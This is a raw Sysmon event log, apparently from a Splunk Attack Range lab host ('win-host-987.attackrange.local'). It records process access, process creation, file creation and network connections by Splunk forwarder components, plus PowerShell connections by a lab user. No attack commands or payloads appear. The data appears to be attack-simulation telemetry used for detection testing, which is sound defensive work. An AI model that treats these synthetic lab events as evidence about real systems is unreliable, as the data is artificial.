22:01:27.570{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.570{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8437-613A-F496-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.570{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8437-613A-F496-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:27.556{B81B27B7-8437-613A-F496-03000000C801}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:28.669{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30D783606AD5CAA76DD87015D87C3682,SHA256=27FD7DA41900C60792A7FE9C77160FFF89603A83A8D19647973F39F4F08FD4EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:29.702{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6112BCC5E67D5A3173345617C8A924,SHA256=91B0F3D536667FB85DF04871211EAFCF16BE656961C8022696BCFBB4BF12E29C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:53.240{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62244-false10.0.1.12-8000- 23542300x800000000000000035129172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:29.185{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5CC03BEE8BDF0D9AEACE4DF2AE2E9511,SHA256=92F7486224EE4E8EC397B5593CF143A58EF7317A35191044E63388915865146F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:30.720{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C26501B51370626E7722925D7748D9F6,SHA256=0F9084B52454F2C2298885559CEB2593698F4654A8D33DDE6A36855D3DC2CF59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:31.766{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4F5F004DE563FD09429C6EF7C15332B,SHA256=303E0F14440C2135C29AFFE30FFA89256F85E1FCA4EE0D22AFF803189339176D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:54.323{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62245-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:32.783{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF7252bbdf.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:32.767{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=330043283201FACBE8B75B14E9191D47,SHA256=38C325161D44B824162D6ABFC24B5FB8181BB0D4BCF63F6A4A6ADB28866E6BAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:33.798{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=231D2720439E0DE0A7473FC4CC3AF877,SHA256=2D932D8BAEF0ADA5CC2070CC808DA787BE480B382BF5F3CDBDDACF2733B9B051,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:33.302{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=066BD2C8EAA845F8B10E3B744F5D0A48,SHA256=E6E1B3A9D1554E7915C77CD6AA5D14F28471AEDE6D131601A35D60FEF18F0756,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:34.804{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C1FDE9045F748DB44A30B89E04B746D,SHA256=B4FD13C08FA98AC6AD38F660ECA93D7FCDB95CD12E3EE83DA135D45F5A7BA5D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:59.269{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62247-false10.0.1.12-8000- 354300x800000000000000035129182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:58.335{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62246-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:35.818{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=615AF48600807C2349D5797CD91205EB,SHA256=35BF0B38A687830C12E6EF69289E389B197C6FA345EBF51AE3D37FFF600A629B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:36.833{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A628EACE33B521D0DA097B3510770A30,SHA256=DB4C82106926E1C0A41F49662D704BC9B014F45B2EA8182835556AC7D7EC4A36,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:37.995{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=B2729719790A33AB68D594B904D33B2D,SHA256=6F32B5B4D5AA7C4BE29A94FB351A7155A98F2F4B3ECF02B7B2A7977AAF0318B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:37.879{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=667F84D28659E9F183C29D813B349C63,SHA256=CE078504D348C1D6F5692488AEA3E511A2B84C3D434E85C175513E900847B8DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:38.897{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3423BBA6F3EA4EC966380E8D2B9317D1,SHA256=81B11C554A33CD21F168E906C60D0620FECEBDCB9FE9C79D4C83D605256629B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:39.931{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=313BE8637C9A7F2A3439E5C6FE11321F,SHA256=18A5473D987E419313600F30181C51F8A8C6DD724014374EC3F1F6A27516C1AA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035129192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:04.364{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62249-false10.0.1.12-8000- 354300x800000000000000035129191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:02:04.349{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62248-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035129190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:39.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DCFE06BA11F0357A459017E51FD04CFE,SHA256=AF0AA8B7DEFAE66A4379B070514495331421E9FC33259C5CA180AFE0DD1FDFD8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.962{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE9453702B203505F37CBE9FAE502734,SHA256=BBDC973D6EB2ECC6C5DCB526849084C4939F34783A7C3CBD2D758E7EC992FA27,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.562{B81B27B7-8444-613A-F596-03000000C801}40365604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.400{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8444-613A-F596-03000000C801}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.400{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.400{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.400{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.400{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.400{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8444-613A-F596-03000000C801}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035129195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.400{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8444-613A-F596-03000000C801}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035129194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:40.394{B81B27B7-8444-613A-F596-03000000C801}4036C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035129255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.977{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8E10BE63F9F29D31E4EE1204B7733A9,SHA256=C1AA4C21DFC99E3962375FA05FD9EE3323DB4749798080CB8E526EB42217DA63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035129254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.630{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11C9A0FAA8B8DC2F72FEA78972DF0DA4,SHA256=BCC8CD2D37BBB0406B74ACEFA3C4CFB99E5C2A20117C1ADA64ED94E7E3567024,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035129253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.598{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8445-613A-F796-03000000C801}532C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035129252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 22:01:41.598{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 